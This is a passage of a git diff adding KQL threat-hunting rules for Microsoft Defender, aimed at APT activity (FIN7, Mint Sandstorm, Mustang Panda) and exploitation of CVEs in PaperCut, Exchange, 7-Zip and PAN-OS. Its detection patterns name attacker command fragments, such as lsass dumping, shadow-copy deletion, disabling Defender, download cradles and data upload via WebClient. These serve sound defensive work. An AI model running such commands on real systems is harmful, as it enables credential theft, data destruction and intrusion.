+DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe" and (not(FolderPath endswith "\\repadmin.exe")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql b/KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql new file mode 100644 index 00000000..dadbfc50 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql @@ -0,0 +1,12 @@ +// Title: Mint Sandstorm - ManageEngine Suspicious Process Execution +// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) +// Date: 2023-04-20 +// Level: critical +// Description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (InitiatingProcessFolderPath contains "\\java" and (InitiatingProcessFolderPath contains "manageengine" or InitiatingProcessFolderPath contains "ServiceDesk")) and ((((ProcessCommandLine contains " echo " or ProcessCommandLine contains "-dumpmode" or ProcessCommandLine contains "-ssh" or ProcessCommandLine contains ".dmp" or ProcessCommandLine contains "add-MpPreference" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "csvhost.exe" or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "ekern.exe" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "iex(" or ProcessCommandLine contains "Invoke-Expression" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "set-MpPreference" or ProcessCommandLine contains "svhost.exe" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine contains "usoprivate" or ProcessCommandLine contains "usoshared" or ProcessCommandLine contains "whoami") or ProcessCommandLine matches regex "[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" or ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\ssession") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe")) or (ProcessCommandLine contains "lsass" and (ProcessCommandLine contains "procdump" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "findstr")) or ((ProcessCommandLine contains "http" and FolderPath endswith "\\curl.exe") or (ProcessCommandLine contains "localgroup Administrators" and ProcessCommandLine contains "/add") or (ProcessCommandLine contains "net" and (ProcessCommandLine contains "user" and ProcessCommandLine contains "/add")) or ((ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableAntiSpyware" and ProcessCommandLine contains "\\Microsoft\\Windows Defender") or (ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableRestrictedAdmin" and ProcessCommandLine contains "CurrentControlSet\\Control\\Lsa")) or (ProcessCommandLine contains "E:jscript" or ProcessCommandLine contains "e:vbscript") or (ProcessCommandLine contains "vssadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadows") or (ProcessCommandLine contains "wbadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog") or (ProcessCommandLine contains "http" and FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "process call create") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadowcopy"))) and (not((ProcessCommandLine contains "download.microsoft.com" and ProcessCommandLine contains "manageengine.com" and ProcessCommandLine contains "msiexec"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql b/KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql new file mode 100644 index 00000000..4a3312da --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql @@ -0,0 +1,12 @@ +// Title: Onyx Sleet APT File Creation Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-24 +// Level: high +// Description: Detects file creation activity that is related to Onyx Sleet APT activity +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith ":\\Windows\\ADFS\\bg\\inetmgr.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql b/KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql new file mode 100644 index 00000000..0ca57ef2 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql @@ -0,0 +1,12 @@ +// Title: PaperCut MF/NG Exploitation Related Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-25 +// Level: high +// Description: Detects exploitation indicators related to PaperCut MF/NG Exploitation +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains " /c " and ProcessCommandLine contains "powershell" and ProcessCommandLine contains "-nop -w hidden" and ProcessCommandLine contains "Invoke-WebRequest" and ProcessCommandLine contains "setup.msi" and ProcessCommandLine contains "-OutFile") or (ProcessCommandLine contains "msiexec " and ProcessCommandLine contains "/i " and ProcessCommandLine contains "setup.msi " and ProcessCommandLine contains "/qn " and ProcessCommandLine contains "IntegratorLogin=fimaribahundq") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql b/KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql new file mode 100644 index 00000000..b11f6a9f --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql @@ -0,0 +1,12 @@ +// Title: PaperCut MF/NG Potential Exploitation +// Author: Nasreddine Bencherchali (Nextron Systems), Huntress DE&TH Team (idea) +// Date: 2023-04-20 +// Level: high +// Description: Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents +| where (FolderPath endswith "\\bash.exe" or FolderPath endswith "\\calc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\pc-app.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql b/KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql new file mode 100644 index 00000000..c4b28c6b --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql @@ -0,0 +1,12 @@ +// Title: Peach Sandstorm APT Process Activity Indicators +// Author: X__Junior (Nextron Systems) +// Date: 2024-01-15 +// Level: high +// Description: Detects process creation activity related to Peach Sandstorm APT +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "QP's*(58vaP!tF4" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql b/KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql new file mode 100644 index 00000000..19cf9ffb --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential APT10 Cloud Hopper Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2017-04-07 +// Level: high +// Description: Detects potential process and execution activity related to APT10 Cloud Hopper operation +// MITRE Tactic: Execution +// Tags: attack.execution, attack.g0045, attack.t1059.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains ".vbs /shell " and FolderPath endswith "\\cscript.exe") or (ProcessCommandLine contains "csvde -f C:\\windows\\web\\" and ProcessCommandLine contains ".log") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql new file mode 100644 index 00000000..7fd5578e --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql @@ -0,0 +1,14 @@ +// Title: Potential APT FIN7 Exploitation Activity +// Author: Alex Walston (@4ayymm) +// Date: 2024-07-29 +// Level: medium +// Description: Detects potential APT FIN7 exploitation activity as reported by Google. +In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.t1059.003, detection.emerging-threats +// False Positives: +// - Notepad++ can legitimately spawn cmd (Open Containing Folder in CMD) + +DeviceProcessEvents +| where (FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\notepad++.exe") or (FolderPath endswith "\\notepad++.exe" and InitiatingProcessFolderPath endswith "\\rdpinit.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql new file mode 100644 index 00000000..5a68bf77 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-04 +// Level: high +// Description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution +// MITRE Tactic: Execution +// Tags: attack.execution, attack.g0046, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "-noni -nop -exe bypass -f \\\\" and ProcessCommandLine contains "ADMIN$") or (ProcessCommandLine contains "-ex bypass -noprof -nolog -nonint -f" and ProcessCommandLine contains "C:\\Windows\\Temp\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql new file mode 100644 index 00000000..8f993f71 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql @@ -0,0 +1,10 @@ +// Title: Potential APT FIN7 Related PowerShell Script Created +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-04 +// Level: high +// Description: Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts +// MITRE Tactic: Execution +// Tags: attack.execution, attack.g0046, detection.emerging-threats + +DeviceFileEvents +| where FolderPath in~ ("host_ip.ps1") or FolderPath endswith "_64refl.ps1" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql b/KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql new file mode 100644 index 00000000..dfb1022a --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql @@ -0,0 +1,12 @@ +// Title: Potential APT Mustang Panda Activity Against Australian Gov +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: high +// Description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.g0129, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "copy SolidPDFCreator.dll" and ProcessCommandLine contains "C:\\Users\\Public\\Libraries\\PhotoTvRHD\\SolidPDFCreator.dll") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains "\\Windows\\CurrentVersion\\Run" and ProcessCommandLine contains "SolidPDF" and ProcessCommandLine contains "C:\\Users\\Public\\Libraries\\PhotoTvRHD\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql b/KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql new file mode 100644 index 00000000..caff29fc --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql @@ -0,0 +1,10 @@ +// Title: Potential Baby Shark Malware Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2019-02-24 +// Level: high +// Description: Detects activity that could be related to Baby Shark malware +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.discovery, attack.t1012, attack.t1059.003, attack.t1059.001, attack.t1218.005, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "powershell.exe mshta.exe http" and ProcessCommandLine contains ".hta") or (ProcessCommandLine contains "reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"" or ProcessCommandLine contains "cmd.exe /c taskkill /im cmd.exe" or ProcessCommandLine contains "(New-Object System.Net.WebClient).UploadFile('http") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql b/KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql new file mode 100644 index 00000000..30c060eb --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql @@ -0,0 +1,10 @@ +// Title: Potential BlackByte Ransomware Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-25 +// Level: high +// Description: Detects command line patterns used by BlackByte ransomware in different operations +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.impact, attack.t1485, attack.t1498, attack.t1059.001, attack.t1140, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains " -single " and FolderPath startswith "C:\\Users\\Public\\") or (ProcessCommandLine contains "del C:\\Windows\\System32\\Taskmgr.exe" or ProcessCommandLine contains ";Set-Service -StartupType Disabled $" or ProcessCommandLine contains "powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(" or ProcessCommandLine contains " do start wordpad.exe /p ") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql new file mode 100644 index 00000000..292bd035 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql @@ -0,0 +1,10 @@ +// Title: Potential CVE-2021-26857 Exploitation Attempt +// Author: Bhabesh Raj +// Date: 2021-03-03 +// Level: high +// Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service +// MITRE Tactic: Execution +// Tags: attack.t1203, attack.execution, cve.2021-26857, detection.emerging-threats + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\UMWorkerProcess.exe" and (not((FolderPath endswith "wermgr.exe" or FolderPath endswith "WerFault.exe"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql new file mode 100644 index 00000000..dff1e1b2 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql @@ -0,0 +1,10 @@ +// Title: Potential CVE-2021-40444 Exploitation Attempt +// Author: Florian Roth (Nextron Systems), @neonprimetime +// Date: 2021-09-08 +// Level: high +// Description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, cve.2021-40444, detection.emerging-threats + +DeviceProcessEvents +| where (FolderPath endswith "\\control.exe" and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\excel.exe")) and (not((ProcessCommandLine endswith "\\control.exe input.dll" or ProcessCommandLine endswith "\\control.exe\" input.dll"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql new file mode 100644 index 00000000..f4a71b7c --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql @@ -0,0 +1,14 @@ +// Title: Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution +// Author: @kostastsale +// Date: 2022-04-25 +// Level: medium +// Description: Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. +As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.initial-access, attack.t1059.006, attack.t1190, cve.2022-22954, detection.emerging-threats +// False Positives: +// - Some false positives are possible as part of a custom script implementation from admins executed with cmd.exe as the child process. + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\prunsrv.exe" and ((ProcessCommandLine contains "/c powershell" and FolderPath endswith "\\cmd.exe") or FolderPath endswith "\\powershell.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql new file mode 100644 index 00000000..1e55dc25 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql @@ -0,0 +1,13 @@ +// Title: Potential CVE-2022-29072 Exploitation Attempt +// Author: frack113, @kostastsale +// Date: 2022-04-17 +// Level: high +// Description: Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. +7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. +The command runs in a child process under the 7zFM.exe process. + +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2022-29072, detection.emerging-threats + +DeviceProcessEvents +| where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and InitiatingProcessFolderPath endswith "\\7zFM.exe") and (not((((ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r ") or (ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".cmd" or ProcessCommandLine endswith ".ps1")) or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql new file mode 100644 index 00000000..892d98cf --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql @@ -0,0 +1,10 @@ +// Title: Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-23 +// Level: high +// Description: Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874. +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2023-36874, detection.emerging-threats + +DeviceFileEvents +| where FolderPath endswith "\\wermgr.exe" and (not((FolderPath contains ":\\$WINDOWS.~BT\\NewOS\\" or FolderPath contains ":\\$WinREAgent\\" or FolderPath contains ":\\Windows\\servicing\\LCU\\" or FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\" or FolderPath contains ":\\WUDownloadCache\\" or FolderPath contains ":\\Windows\\SoftwareDistribution\\Download\\"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql new file mode 100644 index 00000000..901f562f --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql @@ -0,0 +1,12 @@ +// Title: Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-23 +// Level: high +// Description: Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874 +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2023-36874, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\wermgr.exe" and (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "powershell_ise.EXE", "powershell.exe")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql new file mode 100644 index 00000000..fb1edcad --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql @@ -0,0 +1,10 @@ +// Title: Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-23 +// Level: medium +// Description: Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874. +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2023-36874, detection.emerging-threats + +DeviceFileEvents +| where (FolderPath contains ":\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\" and FolderPath endswith "\\Report.wer") and (not((FolderPath contains "\\ReportArchive\\AppCrash_" or FolderPath contains "\\ReportArchive\\AppHang_" or FolderPath contains "\\ReportArchive\\Critical_" or FolderPath contains "\\ReportArchive\\Kernel_" or FolderPath contains "\\ReportArchive\\NonCritical_"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql new file mode 100644 index 00000000..8f7633e4 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql @@ -0,0 +1,14 @@ +// Title: Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation +// Author: Andreas Braathen (mnemonic.io) +// Date: 2024-04-25 +// Level: medium +// Description: Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled. +As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function. + +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2024-3400, detection.emerging-threats +// False Positives: +// - The PAN-OS device telemetry function does not enforce a standard filename convention, but observations are unlikely. + +DeviceFileEvents +| where (FolderPath contains "{IFS}" or FolderPath contains "base64" or FolderPath contains "bash" or FolderPath contains "curl" or FolderPath contains "http") and FolderPath startswith "/opt/panlogs/tmp/device_telemetry/" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql b/KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql new file mode 100644 index 00000000..d029b8b8 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential Emotet Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2019-09-30 +// Level: high +// Description: Detects all Emotet like process executions that are not covered by the more generic rules +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or ProcessCommandLine contains "JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ" or ProcessCommandLine contains "QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA" or ProcessCommandLine contains "kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA" or ProcessCommandLine contains "IgAoACcAKgAnACkAOwAkA" or ProcessCommandLine contains "IAKAAnACoAJwApADsAJA" or ProcessCommandLine contains "iACgAJwAqACcAKQA7ACQA" or ProcessCommandLine contains "JABGAGwAeAByAGgAYwBmAGQ" or ProcessCommandLine contains "PQAkAGUAbgB2ADoAdABlAG0AcAArACgA" or ProcessCommandLine contains "0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA" or ProcessCommandLine contains "9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA") and (not((ProcessCommandLine contains "fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ" or ProcessCommandLine contains "wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA" or ProcessCommandLine contains "8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql b/KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql new file mode 100644 index 00000000..83716e84 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql @@ -0,0 +1,10 @@ +// Title: Potential Exploitation Attempt From Office Application +// Author: Christian Burkard (Nextron Systems), @SBousseaden (idea) +// Date: 2022-06-02 +// Level: high +// Description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, cve.2021-40444, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "../../../.." or ProcessCommandLine contains "..\\..\\..\\.." or ProcessCommandLine contains "..//..//..//..") and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\visio.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql new file mode 100644 index 00000000..c60da680 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql @@ -0,0 +1,13 @@ +// Title: Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process +// Author: Arnim Rupp, Nasreddine Bencherchali, Thomas Patzke +// Date: 2024-04-01 +// Level: high +// Description: Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094. + +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2024-3094, detection.emerging-threats +// False Positives: +// - Administrative activity directly with root authentication might trigger this rule if it's unnecessarily prefixed with "sh -c" or "bash -c" + +DeviceProcessEvents +| where (ProcessCommandLine startswith "bash -c" or ProcessCommandLine startswith "sh -c") and InitiatingProcessFolderPath endswith "/sshd" and AccountName =~ "root" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql new file mode 100644 index 00000000..5f0c094c --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql 